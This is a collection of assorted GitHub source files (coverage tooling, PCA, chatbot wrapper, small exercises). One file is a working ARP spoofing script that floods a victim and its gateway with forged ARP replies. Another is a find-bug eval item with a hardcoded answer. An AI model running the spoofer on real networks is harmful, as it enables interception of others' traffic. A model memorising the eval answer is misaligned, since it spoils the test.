test_suite_flag.append([test_suite, \" \".join(flags[i])])\n\n setattr(args, 'test_suites', test_suite_flag)\n\n return test_suites, flags, env_variables, names\n\n\ndef getModulesFromXml(root, args):\n \"\"\" Get modules' sources and objects directories from the xml input file.\n\n Arguments:\n root (namespace): tree representation of the xml file.\n args (namespace): option flags values.\n\n Returns:\n modules (str list list): list of pairs [sources, objects] of the\n modules to cover.\n \"\"\"\n\n modules = []\n\n for module in root.iter('module'):\n modules.append([module.get('sources'), module.get('objects')])\n\n setattr(args, 'modules', modules)\n\n return modules\n\n\ndef runFromXml(arg_parser, args):\n \"\"\" Launch coverage tests from an xml input file.\n\n Arguments:\n arg_parser (namespace): arguments parser of this script.\n args (namespace): option flags values.\n \"\"\"\n\n root = ET.parse(args.xml_input).getroot()\n properties = getXmlProperties(root, args)\n test_suites, flags, env_variables, names = getTestSuitesFromXml(root, args)\n modules = getModulesFromXml(root, args)\n\n checkIfModulesExists(args, modules)\n\n if args.csv_output != '':\n csvWriteProperties(args)\n csvWriteModulesHeaders(modules)\n\n for i, test_suite in enumerate(test_suites):\n runCoverageTestSuite(arg_parser, args, test_suite, flags[i],\n env_variables[i], modules, names[i])\n\n if args.run_lcov:\n results = CoverageResults()\n lcov_file = lcovMergeTestSuitesInfoFiles(args)\n\n if lcov_file is not None:\n lcovParseInfoFile(args, lcov_file, results, True)\n\n if not args.quiet:\n pOut('\\n' + v.SHARPS_TAG + 'Coverage of all test suites summary\\n')\n displayCoverageResults(args, ['all test suites'], results)\n\n if args.csv_output != '':\n csvWriteFile(results, args.csv_output)\n\n if args.junit_xml_output != '':\n jUnitMergeTestSuites(args.junit_xml_output)\n\n if args.check_regression:\n checkRegression(args, results)\n","repo_name":"codeplaysoftware/oneapi-construction-kit","sub_path":"scripts/coverage/modules/xmlinput.py","file_name":"xmlinput.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"61"} +{"seq_id":"23860912288","text":"'''num = int(input())\nif num != 0:\n if num > 0:\n print(\"Number is greater than Zero\")\n else:\n print(\"Number is less than Zero\")'''\nimport math\n\n\ndef is_prime(num):\n if num == 1:\n return 0\n for i in range(2, int(math.sqrt(num))+1):\n if num % i == 0:\n return i\n return 1\n\n\na = int(input())\nb = int(input())\nz = math.gcd(a, b)\nres = is_prime(z)\nif res == 1:\n print(1)\nelif not res: \n print(\"Second Greatest GCD Doesn't Exist\")\nelse:\n print(z // res)","repo_name":"35C4n0r/Codeforces-Py-","sub_path":"PycharmProjects/College/main3.py","file_name":"main3.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32532686742","text":"def tri(n):\n \"\"\"Everyone knows Fibonacci sequence, it was studied deeply by mathematicians in \n the last couple centuries. 
However, what people don't know is Tribonacci sequence.\n    Tribonacci sequence is defined by the recurrence:\n    tri(1) = 3\n    tri(n) = 1 + n / 2, if n is even.\n    tri(n) = tri(n - 1) + tri(n - 2) + tri(n + 1), if n is odd.\n    For example:\n    tri(2) = 1 + (2 / 2) = 2\n    tri(4) = 3\n    tri(3) = tri(2) + tri(1) + tri(4)\n           = 2 + 3 + 3 = 8 \n    You are given a non-negative integer number n, you have to return a list of the \n    first n + 1 numbers of the Tribonacci sequence.\n    Examples:\n    tri(3) = [1, 3, 2, 8]\n    \n    Example solution:\n    # line 1\n    if n == 0:\n    # line 2\n        return [1]\n    # line 3\n    my_tri = [1, 3]\n    # line 4\n    for i in range(2, n + 1):\n    # line 5\n        if i % 2 == 0:\n    # line 6\n            my_tri.append(i / 2 + 1)\n    # line 7\n        else:\n    # line 8\n            my_tri.append(my_tri[i - 1] + my_tri[i - 2] + (n + 2) / 2)\n    # line 9\n    return my_tri\n    \n    \"\"\"\n    # Please print out which line of the above program contains an error. E.g. if the bug is on line 4 then print 4\n    # END OF CONTEXT\n    print(\"8\")\n    # END OF SOLUTION\n\ndef check(candidate):\n\n    import io\n    from contextlib import redirect_stdout\n\n    f = io.StringIO()\n    with redirect_stdout(f):\n        candidate(10)\n    out = f.getvalue().strip('\\n')\n\n    assert \"8\" == out\n    for i in range(0, 10):\n        if i != 8:\n            assert str(i) != out\n\nif __name__ == '__main__':\n    check(tri)\n","repo_name":"openai/code-align-evals-data","sub_path":"alignment/find_bug/tri.py","file_name":"tri.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"61"}
+{"seq_id":"11383661885","text":"from __future__ import print_function, division, absolute_import\n\n__author__ = 'Moshe Shilemay'\n__license__ = 'MIT'\n__email__ = \"moshes777@gmail.com\"\n'''\n    Last modified: 27.01.209\n    Python Version: 3.6\n'''\n\nimport numpy as np\nimport os\nfrom sklearn.decomposition import PCA, IncrementalPCA\nfrom sklearn import model_selection\nfrom sklearn import preprocessing\nimport pickle\nfrom data_generation.DataGeneration import DataGeneration\n\n# ------------ parameters ------------\n# featuresFile = r'../Results/script_featuresExtraction/features_3_examples.p'\nfeaturesFileList = [\n    r'../Results/script_featuresExtraction/features_All_examples_without_new_whale.p',\n    # r'../Results/script_featuresExtraction/features_new_whale_examples.p'\n    ]\nresultsDir = '../Results/script_calcSavePCA'\nsfx = '_without_new_whale'\n# sfx = '_new_whale_examples'#\nNMaxIds = None #10 # maximum number of ids to load, if None - all ids will be used\nNComponentsPCA = 4096 # number of pca components, should be equal to or greater than NMaxIds\ntestSize = 0.2 # test set percentage\nipcaFlag = True # if True, incremental pca is used, otherwise regular pca is used\nipcaBatchSize = NComponentsPCA #10 # number of features in each ipca iteration, should be equal to or greater than NComponentsPCA\n\nos.makedirs(resultsDir, exist_ok=True) # create results dir if it does not exist\n\n# ------------ load features ------------\n\ncounter = 0\nfeatsList = []\nidsList = []\n\nfor featuresFile in featuresFileList: # iterate over all features files\n\n    with open(featuresFile, 'rb') as fid:\n        try:\n            while True:\n                id, feats = pickle.load(fid)\n                idsList.extend(np.repeat(id, len(feats)))\n                featsList.extend(feats)\n                counter += 1\n                print('reading features {}'.format(counter))\n                if (NMaxIds is not None) and (counter >= NMaxIds):\n                    break\n        except EOFError:\n            pass\n\n# convert lists to ndarrays\nprint('converting lists to ndarrays ...')\nfeats = np.asarray(featsList)\nids = 
np.asarray(idsList)\nprint('done')\n\n# ------------ Pre-Processing ------------\n\n# normalize each feature to have zero mean and unit variance\nprint('whitening features ...')\n# feats = (feats - feats.mean(axis=1)[:,np.newaxis]) / feats.std(axis=1)[:,np.newaxis]\nscaler = preprocessing.StandardScaler(copy=False, with_mean=True, with_std=True)\nfeats = scaler.fit_transform(feats)\nprint('done')\n\n# ------------ Split to Train and Validation Sets ------------\n\nprint('splitting data to train and val ...')\ntrainInd, valInd = DataGeneration.stratifiedSplit(y=ids, test_size=testSize, random_state=42)\nprint('done')\n\n# ------------ PCA ------------\n\n# verify that number of principal components is not greater than number of examples\n# verify that the following holds: (see: https://github.com/scikit-learn/scikit-learn/issues/6452)\n# n_samples > n_components > batch_size\nif len(trainInd) < NComponentsPCA:\n    NComponentsPCA = len(trainInd)\n\nif ipcaBatchSize < NComponentsPCA:\n    NComponentsPCA = ipcaBatchSize\n\n# get NComponentsPCA principal components using PCA - using train data only\nprint('fitting pca to training data...')\nif ipcaFlag:\n    # incremental PCA - calculate PCA incrementally in batches\n    pca = IncrementalPCA(n_components=NComponentsPCA, batch_size=ipcaBatchSize)\n    pca.fit(feats[trainInd])\nelse:\n    # regular PCA - loads all data into memory\n    pca = PCA(n_components=NComponentsPCA)\n    pca.fit(feats[trainInd])\nprint('done')\n\nprint('{} components PCA - explained variance = {}'.format(NComponentsPCA, pca.explained_variance_ratio_[0]))\n\n# transform\nprint('transforming train and val data according to pca...')\ntrainPCA = pca.transform(feats[trainInd])\nvalPCA = pca.transform(feats[valInd])\nprint('done')\n\n# save pca\nprint('saving pca data ...')\n# fileName = os.path.join(resultsDir, 'pca_{}_trainExamples_{}_components{}.p'.format(trainPCA.shape[0], trainPCA.shape[-1], sfx))\n# with open(fileName, 'wb') as fid:\n#     pickle.dump([pca, trainPCA, valPCA, trainInd, valInd], fid)\n\n# save pca instance\nfileName = os.path.join(resultsDir, 'pca_{}_trainExamples_{}_components{}_instance.p'.format(trainPCA.shape[0], trainPCA.shape[-1], sfx))\nwith open(fileName, 'wb') as fid:\n    pickle.dump([pca], fid)\n\n# save transformed features in batches\nfileName = os.path.join(resultsDir, 'pca_{}_trainExamples_{}_components{}_features.p'.format(trainPCA.shape[0], trainPCA.shape[-1], sfx))\nwith open(fileName, 'wb') as fid:\n    pickle.dump([trainPCA, valPCA, trainInd, valInd], fid)\n\n# # save transformed train features in batches\n# fileName = 'pca_{}_trainExamples_{}_components{}_featuresTrain.p'.format(trainPCA.shape[0], trainPCA.shape[-1], sfx)\n# fid = open(os.path.join(resultsDir, fileName), 'wb')\n#\n# batch_size = 100\n# n_examples = trainPCA.shape[0]\n# n_batches = int(n_examples / batch_size)\n# n_residual = n_examples - batch_size * n_batches\n#\n# for n in np.arange(n_batches):\n#     ind = np.arange(n*batch_size, (n+1)*batch_size)\n#     pickle.dump([trainPCA[ind, ...], trainInd[ind, ...]], fid)\n#\n# if n_residual > 0:\n#     ind = np.arange(batch_size * n_batches, n_examples)\n#     pickle.dump([trainPCA[ind, ...], trainInd[ind, ...]], fid)\n#\n# fid.close()\n\nprint('done')\n\nprint('Done!')\n","repo_name":"moshes7/humpback-whale","sub_path":"scripts/script_calcSavePCA.py","file_name":"script_calcSavePCA.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25498815623","text":"#!/usr/bin/env 
python3\n\ncard_public = 1327981\ndoor_public = 2822615\ngen = 7\nmod = 20201227\n\n# It's Christmas Day and I'm in a rush, so let's just brute-force this...\n\ndef rev(public):\n    i = 1\n    while True:\n        if pow(gen, i, mod) == public:\n            return i\n        i += 1\n\ndoor_secret = rev(door_public)\n\nprint(f\"Part one: {pow(card_public, door_secret, mod)}\")\n","repo_name":"sde1000/aoc2020","sub_path":"day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24420211706","text":"# I don't think I need this for this project any more, but it might be worth packaging up on its own\n\nclass _SourceOfTruth(object):\n    '''\n    Sources of Truth are singletons that map specified keys to globally singular values\n    that are immutable, once set (using public interfaces)\n    Sources of Truth follow rules regarding how key/value setting may happen, specifically:\n    1. Only keys that are expected may be set (i.e., they must be present in the object definition)\n    2. Values are updated *only* the first time any attempt is made to set them\n    3. Thereafter, any attempt to set that attribute to the same value is ignored\n    4. Any attempt to set that attribute to a *new* value is treated as evidence of significant design problems\n    '''\n    managed_names = dict()\n\n    def __init__(self):\n        raise RuntimeError(f'Attempt to initialize SourceOfTruth subclass {self.__class__.__name__}. Please don\\'t '\n                           f'create multiple instances of the truth ;)')\n\n    @classmethod\n    def set(cls, key, value):\n        # only names in the SOT definition are allowed\n        if key not in cls.managed_names:\n            raise RuntimeError(f'Attempt to set unexpected key {key} on {cls.__name__}')\n\n        current_value = cls.managed_names[key]\n        if current_value is None:\n            # considered declared but uninitialized, OK to initialize with new value\n            cls.managed_names[key] = value\n        elif current_value != value:\n            # Houston, we have a problem\n            raise RuntimeError(f'Attempt to set {cls.__name__} key {key} to more than one value: '\n                               f'Existing value: {current_value}; Attempted Value: {value}')\n\n    @classmethod\n    def get(cls, name):\n        # there should not be a default value\n        return cls.managed_names[name]\n","repo_name":"dylrei/flowly","sub_path":"flowly/runtime/truth.py","file_name":"truth.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"12345517246","text":"import os\nfrom scipy.io import wavfile\n\nroot = '.'\n\nduration = 4 # seconds\nlabels = ['normal', 'deep', 'strong', 'none']\nsource_dir = '{}/datawav_filter'.format(root)\ntrain_dir = '{}/data/training'.format(root)\ntest_dir = '{}/data/testing'.format(root)\n\n# check that the output directories do not already exist\nassert not os.path.isdir(train_dir), \"Error! train_dir already exists - {}\".format(train_dir)\nassert not os.path.isdir(test_dir), \"Error! 
test_dir already exists - {}\".format(test_dir)\n\ntrain_spk = [\n    \"01_male_23_BQuyen\",\n    \"02_male_22_PTuan\",\n    \"03_male_21_BDuong\",\n    \"04_female_21_LAnh\",\n    \"05_male_21_NLinh\",\n    \"06_male_21_QViet\",\n\n    \"07_male_21_MQuang\",\n    \"08_male_21_TLong\",\n    \"09_male_21_Ngon\",\n    \"10_male_21_Nam\",\n    \"11_female_21_Tam\",\n    \"12_male_21_Tam\",\n    \"13_female_20_TNhi\",\n    \"14_male_21_Khanh\",\n\n    \"15_female_21_PPhuong\",\n    \"16_male_21_TTung\",\n    \"17_male_21_Trung\",\n    \"18_male_21_Hoa\",\n    \"19_male_21_Minh_no-ok\",\n    \"20_male_21_Viet\",\n    \"21_male_21_Hai\",\n    \"22_male_21_VHung\",\n    \"23_male_21_CNDuong\",\n    \"24_female_21_MPham\",\n    \"25_famale_21_TCuc_sickness\",\n    \"26_female_19_Linh\",\n\n]\n\ntest_spk = [\n    \"27_female_19_TThanh\",\n    \"28_male_19_VHoa_asthma\",\n    \"29_male_19_Cong\",\n]\n\n# build the per-label input and output paths\nfor label in labels:\n    indir = os.path.join(source_dir, label)\n    outdir_train = os.path.join(train_dir, label)\n    outdir_test = os.path.join(test_dir, label)\n    assert os.path.exists(indir), \"Error! {} not found\".format(indir)\n    os.makedirs(outdir_train) # create the output folders\n    os.makedirs(outdir_test)\n    for f in os.listdir(indir):\n        if \".wav\" in f:\n            infile = os.path.join(indir, f) # full path to the input file\n            # keep only clips that are exactly `duration` seconds long (data holds the samples)\n\n            rate, data = wavfile.read(infile)\n            if len(data) == duration * rate:\n                spk = \"_\".join(f.replace(\".wav\", \"\").split(\"_\")[:-2])\n                if spk in train_spk:\n                    outfile = os.path.join(outdir_train, f) # symlink name\n                    os.symlink(os.path.realpath(infile), outfile) # create a shortcut (symlink)\n                    print(os.path.realpath(infile), outfile)\n                elif spk in test_spk:\n                    outfile = os.path.join(outdir_test, f)\n\n                    os.symlink(os.path.realpath(infile), outfile)\n                    print(os.path.realpath(infile), outfile)","repo_name":"PhungHaThiKim/SouthDetection","sub_path":"splitdata.py","file_name":"splitdata.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"12257871667","text":"import ast\nimport importlib\nimport json\nimport os\nimport sys\n\nfrom . import Env, ENVS_RESULT_FILENAME\n\nVAR_TYPES = Env.valid_types.keys()\n\nif sys.version_info >= (3, 0):\n    raw_input = input\n\ndef import_util(imp):\n    \"\"\"\n    Lazily imports a util (a class,\n    function, or variable) from a module,\n    given a dotted string.\n    @param imp:\n    \"\"\"\n\n    mod_name, obj_name = imp.rsplit('.', 1)\n    mod = importlib.import_module(mod_name)\n    return getattr(mod, obj_name)\n\n\ndef convert_module(module):\n    attr_list = []\n    for k, v in module.__dict__.items():\n        if k.isupper():\n            convert = bool(int(raw_input('Convert {}? (1=True,0=False): '.format(k))))\n            attr_dict = {'name': k, 'convert': convert}\n            default_val = None\n            if convert:\n\n                default_val = raw_input('Default Value? (default: {}): '.format(v))\n                if default_val:\n                    default_val = ast.literal_eval(default_val)\n                if not default_val:\n                    default_val = v\n                attr_dict['default_val'] = default_val\n\n                var_type = raw_input('Variable Type Choices (ex. 
boolean,string,list,tuple,integer,float,dict): ')\n if not var_type in VAR_TYPES:\n raise ValueError('{} not in {}'.format(var_type, VAR_TYPES))\n attr_dict['var_type'] = var_type\n if not default_val:\n default_val = v\n attr_list.append(attr_dict)\n return attr_list\n\n\ndef import_mod(module):\n if sys.version_info.major == 3:\n try:\n m = importlib.import_module(module)\n except ModuleNotFoundError:\n sys.path.insert(0, os.getcwd())\n m = importlib.import_module(module)\n else:\n try:\n m = importlib.import_module(module)\n except ImportError:\n sys.path.insert(0, os.getcwd())\n m = importlib.import_module(module)\n return m\n\n\ndef list_envs_module(module):\n with open(ENVS_RESULT_FILENAME, 'w+') as f:\n f.write('[')\n import_mod(module)\n with open(ENVS_RESULT_FILENAME, 'a') as f:\n f.write('{}]')\n with open(ENVS_RESULT_FILENAME, 'r') as f:\n envs_result = json.load(f)\n envs_result.pop()\n return envs_result\n","repo_name":"capless/envs","sub_path":"envs/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"19291317823","text":"import socket\nimport struct\nimport binascii\ns = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))\ns.bind((\"ens33\", socket.htons(0x0003)))\n\nsor = b'\\x00\\x50\\x56\\x29\\x6c\\x85'\n\nvictmac = b'\\x00\\x0c\\x29\\xdb\\x9a\\xb2'\n\ngatemac = b'\\x00\\x50\\x56\\xc0\\x00\\x02'\ncode = b'\\x08\\x06'\neth1 = victmac+sor+code #for victim\neth2 = gatemac+sor+code # for gateway\nprint (eth1)\nhtype = b'\\x00\\x01'\nprotype = b'\\x08\\x00'\nhsize = b'\\x06'\npsize = b'\\x04'\nopcode = b'\\x00\\x02'\n\ngate_ip = '192.168.21.1'\nvictim_ip = '192.168.21.141' \ngip = socket.inet_aton ( gate_ip )\nvip = socket.inet_aton ( victim_ip )\n\n\narp_victim = eth1+htype+protype+hsize+psize+opcode+sor+gip+victmac+vip\narp_gateway= eth2+htype+protype+hsize+psize+opcode+sor+vip+gatemac+gip\n\n\nwhile 1:\n\ts.send(arp_victim)\n\ts.send(arp_gateway)\n\n\n","repo_name":"mohitraj/Network-Penetration-testing","sub_path":"tcp1/arpsp1.py","file_name":"arpsp1.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37358215805","text":"\"\"\"\nhttps://leetcode.com/problems/climbing-stairs/\n@date: 2021-08-25\n\"\"\"\n\n\nclass Solution:\n def climbStairs(self, n: int) -> int:\n if n == 1:\n return 1\n if n == 2:\n return 2\n\n a, b = 1, 2\n for i in range(0, n - 2):\n a, b = b, a + b\n return b\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.climbStairs(5))\n","repo_name":"ZhouLihua/leetcode","sub_path":"climbingStairs.py","file_name":"climbingStairs.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6795885784","text":"import requests\nfrom lxml import etree\nfrom selenium import webdriver\nimport os\nimport zipfile\n\ndef search():\n print('搜索:')\n kw_search = input()\n url_search = 'https://www.dmzj.com/dynamic/o_search/index/' + kw_search\n result_search = requests.get(url_search)\n if '很遗憾,您搜索的内容暂时没有找到。' in result_search.text:\n print('很遗憾,您搜索的内容暂时没有找到。')\n else:\n tree_search = etree.HTML(result_search.text)\n page_search = tree_search.xpath\\\n ('//div[@class=\"bottom_page page\"]/a[text()!=\"上一页\"][text()!=\"下一页\"]/text()')\n print('共' + str(len(page_search)) + '页搜索结果')\n print('输入页数:')\n i_page_search = 
int(input()) - 1\n\n if i_page_search in range(0,len(page_search)):\n result_search = requests.get(url_search + '/' + page_search[i_page_search])\n print('第' + page_search[i_page_search] + '页')\n print()\n tree_search = etree.HTML(result_search.text)\n global title_search\n title_search = tree_search.xpath('//ul[@class=\"update_con autoHeight\"]/li/a/@title')\n latest_search = tree_search.xpath('//p[@class=\"newPage\"]/text()')\n global link_search\n link_search = tree_search.xpath('//ul[@class=\"update_con autoHeight\"]/li/a/@href')\n for i_comic in range(0,len(title_search)):\n print(i_comic + 1)\n print(title_search[i_comic] + ' ' + latest_search[i_comic])\n print()\n global input_i_comic\n print('输入漫画序号:')\n input_i_comic = int(input()) - 1\n else:\n print('该页没有搜索结果')\n\ndef comic():\n print(title_search[input_i_comic])\n print()\n response_comic = requests.get(link_search[input_i_comic])\n if '4004.gif' in response_comic.text:\n print('因版权等原因暂停提供')\n input()\n exit()\n else:\n tree_comic = etree.HTML(response_comic.text)\n global title_volume\n global link_volume\n title_volume = tree_comic.xpath('//div[@class=\"cartoon_online_border\"]/ul/li/a/text()')\n link_volume = tree_comic.xpath('//div[@class=\"cartoon_online_border\"]/ul/li/a/@href')\n\n for i_volume in range(0,len(title_volume)):\n print(i_volume + 1)\n print(title_volume[i_volume])\n print()\n\n global input_i_volume\n print('输入卷数:')\n input_i_volume = int(input()) - 1\n\ndef images():\n dir_comic = title_search[input_i_comic].replace('/', ' ')\n if not os.path.exists(dir_comic):\n os.mkdir(dir_comic)\n os.chdir(dir_comic)\n\n print(title_volume[input_i_volume])\n print()\n print('正在下载...')\n browser = webdriver.PhantomJS()\n browser.get('http://manhua.dmzj.com' + link_volume[input_i_volume])\n tree_volume = etree.HTML(browser.page_source)\n url_image = tree_volume.xpath('//select[@id=\"page_select\"]/option/@value')\n\n dir_volume = title_volume[input_i_volume].replace('/', ' ')\n if not os.path.exists(dir_volume):\n os.mkdir(dir_volume)\n else:\n exit()\n os.chdir(dir_volume)\n headers = {'Referer':'http://manhua.dmzj.com' + link_volume[input_i_volume]}\n\n name_image = []\n for i_image in range(0,len(url_image)):\n name_image.append(str(i_image) + '.jpg')\n get_image = requests.get(url_image[i_image], headers = headers)\n with open(name_image[i_image], 'wb') as fd:\n fd.write(get_image.content)\n\n os.chdir(os.path.dirname(os.path.abspath('.')))\n zip_volume = zipfile.ZipFile(dir_volume + '.zip', 'w')\n for i_image in range(0,len(url_image)):\n zip_volume.write('./' + dir_volume + '/' + name_image[i_image])\n\n print()\n print('下载完毕\\n')\n\n\nprint('=' * 30)\nprint('动漫之家下载工具 Beta 1.0')\nprint('ssjgoku制作')\nprint('2017年11月4日')\nprint('输入\"q\"退出程序')\nprint('=' * 30)\nprint()\nif input() == 'q':\n exit()\nelse:\n search()\n comic()\n if not os.path.exists('download'):\n os.mkdir('download')\n os.chdir('download')\n images()","repo_name":"h4ckm310n/pwxssj.github.io","sub_path":"dmzj_crawler/dmzj_crawler.py","file_name":"dmzj_crawler.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11320559927","text":"import string\nimport logging\nfrom typing import Tuple, Callable, List\n\n\nclass OpenAIChatbot():\n ROLE_SYSTEM = \"system\"\n ROLE_USER = \"user\"\n ROLE_ASSISTANT = \"assistant\"\n\n def __init__(\n self,\n openai,\n initial_prompt: str,\n output_callback: Callable[[str], None],\n names: Tuple[str, str] = (\"AI\", 
\"Human\"),\n end_token: str = \"END\",\n openai_model: str = \"text-davinci-003\",\n openai_endpoint: str = \"completions\"\n ):\n self.openai = openai\n self.initial_prompt = initial_prompt\n self.output_callback = output_callback\n self.names = names\n self.end_token = end_token\n self.openai_model = openai_model\n self.openai_endpoint = openai_endpoint\n\n self.prompt = None\n self.stop = [f\"{name}:\" for name in names]\n\n def start_session(self):\n self.prompt = self.initial_prompt\n logging.debug(f\"Starting chatbot session with prompt:\\n{self.prompt}\")\n self._get_all_utterances()\n\n def send_responses(self, responses: List[str]):\n if self.prompt is None:\n raise RuntimeError(\"Chatbot session is not active\")\n\n for response in responses:\n self._add_response(self.names[1], response.strip())\n\n self._get_all_utterances()\n\n def session_ended(self) -> bool:\n return self.prompt is None\n\n def _add_response(self, name: str, response: str):\n log_response = f\"{name}: {response}\"\n logging.debug(f\"Adding response: {repr(log_response)}\")\n self.prompt += f\"\\n{name}: {response}\"\n\n def _get_all_utterances(self):\n utterance = self._get_next_utterance()\n\n if utterance:\n self.output_callback(utterance)\n\n if self.prompt is not None:\n self.prompt = f\"{self.prompt} {utterance}\"\n\n def _get_next_utterance(self) -> str:\n self.prompt += f\"\\n{self.names[0]}:\"\n\n openai_params = {\n \"max_tokens\": 150,\n \"stop\": self.stop,\n \"temperature\": 0.9\n }\n\n if self.openai_endpoint == \"completions\":\n completion = self.openai.Completion.create(\n model=self.openai_model,\n prompt=self.prompt,\n **openai_params\n )\n utterance = completion.choices[0][\"text\"]\n elif self.openai_endpoint == \"chat\":\n completion = self.openai.ChatCompletion.create(\n model=self.openai_model,\n messages=[{\"role\": self.ROLE_SYSTEM, \"content\": self.prompt}],\n **openai_params\n )\n utterance = completion['choices'][0]['message']['content']\n\n utterance = utterance.strip(string.whitespace + '\"')\n logging.debug(f\"Got utterance: {repr(utterance)}\")\n\n end_token_pos = utterance.find(self.end_token)\n if end_token_pos != -1:\n utterance = utterance[:end_token_pos].strip()\n # Ending the session\n self.prompt = None\n\n return utterance\n","repo_name":"artmatsak/grace","sub_path":"openai_chatbot.py","file_name":"openai_chatbot.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"61"} +{"seq_id":"9606446203","text":"import pandas as pd\nimport global_variables as v\nimport statistics\n\ndef run_word_counter(preprocessed_rows):\n\n count_list = []\n\n for index, row in preprocessed_rows.iterrows(): # for each record in data file\n tokens = row['transformedtokens'].strip().split(' ')\n print(tokens)\n\n token_count = len(tokens)\n count_list.append(token_count)\n\n print('maximum length: ' + str(max(count_list)))\n print('mean no. 
of words: ' + str(sum(count_list) / len(count_list) ))\n print('standard deviation ' + str(statistics.stdev(count_list)))\n\ndef main():\n\n print(\"Starting Pipeline Validation\")\n\n print(\"Validating Maintenance Item Tagged Records\")\n data = pd.read_excel(v.transformed_text_path_stage_4, sheet_name=v.input_file_sheet_name)\n run_word_counter(data)\n\n print(\"Validation Finished\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"uwasystemhealth/Maintenance_Work_Order_Processing_Pipeline_Public","sub_path":"src/word_analysis.py","file_name":"word_analysis.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23378519961","text":"#!/usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\n__author__ = \"Régis Décamps\"\r\n\r\nimport sys\r\n\r\ndef read_input(file):\r\n matrix = []\r\n for i in range(4):\r\n line = file.readline()\r\n # remove leading \\n\r\n matrix.append(line.strip())\r\n return matrix\r\n\r\n\r\ndef has_won(player, matrix):\r\n return has_won_h(player, matrix) or has_won_v(player, matrix) or has_won_d(player, matrix)\r\n\r\n\r\ndef has_won_h(player, matrix):\r\n for i in range(4):\r\n placed = sum((1 if (matrix[i][j]==player or matrix[i][j]=='T') else 0 for j in range(4)))\r\n if placed==4:\r\n return True\r\n return False\r\n\r\n\r\ndef has_won_v(player, matrix):\r\n for j in range(4):\r\n placed = sum((1 if (matrix[i][j]==player or matrix[i][j]=='T') else 0 for i in range(4)))\r\n if placed==4:\r\n return True\r\n return False\r\n\r\n\r\ndef has_won_d(player, matrix):\r\n return has_won_d1(player, matrix) or has_won_d2(player, matrix)\r\n\r\n\r\ndef has_won_d1(player, matrix):\r\n for i in range(4):\r\n if matrix[i][i] != player and matrix[i][i] != 'T':\r\n return False\r\n return True\r\n\r\n\r\ndef has_won_d2(player, matrix):\r\n for i in range(4):\r\n j = 3 - i\r\n if matrix[i][j] != player and matrix[i][j] != 'T':\r\n return False\r\n return True\r\n\r\n\r\ndef game_not_completed(matrix):\r\n for line in matrix:\r\n if '.' 
in line:\r\n return True\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n with open(sys.argv[1]) as f:\r\n nb_games = int(f.readline()) + 1\r\n for i in range(1, nb_games):\r\n matrix = read_input(f)\r\n\r\n if has_won('O', matrix):\r\n print(\"Case #{i}: O won\".format(i=i))\r\n elif has_won('X', matrix):\r\n print(\"Case #{i}: X won\".format(i=i))\r\n elif game_not_completed(matrix):\r\n print(\"Case #{i}: Game has not completed\".format(i=i))\r\n else:\r\n print(\"Case #{i}: Draw\".format(i=i))\r\n #empty line\r\n if i < nb_games:\r\n f.readline()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/1194.py","file_name":"1194.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2480181527","text":"import matplotlib.pyplot as plt\nimport torch\n\nccm = torch.tensor([[1655, -442, -189], [-248, 1466, -194], [-48, -770, 1842]], dtype=torch.float32)\nrgb_data = torch.randint(0, 255, (3, 100))\nrgb_data = rgb_data.float()\n\nrgb_target = ccm.mm(rgb_data)/1024.0\n\nfig1 = plt.figure(1)\nax1 = fig1.add_subplot(111, projection='3d')\nx2 = rgb_data[0]\ny2 = rgb_data[1]\nz2 = rgb_data[2]\n\nax1.scatter(x2, y2, z2, marker='*', c='b', label='origin RGB')\n\nax1.set_xlim(-80, 360)\nax1.set_ylim(-80, 360)\nax1.set_zlim(-80, 360)\nax1.set_xlabel('R')\nax1.set_ylabel('G')\nax1.set_zlabel('B')\n\nx3 = rgb_target[0]\ny3 = rgb_target[1]\nz3 = rgb_target[2]\n\nax1.scatter(x3, y3, z3, marker='o', c='c', label='target rgb')\n\nfor i in range(len(x3)):\n ax1.plot([x2[i], x3[i]], [y2[i], y3[i]], [z2[i], z3[i]], 'k-.')\nax1.legend()\n\nplt.show()","repo_name":"luimoli/ColorCheckerCailibration_experiment","sub_path":"Spatial/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 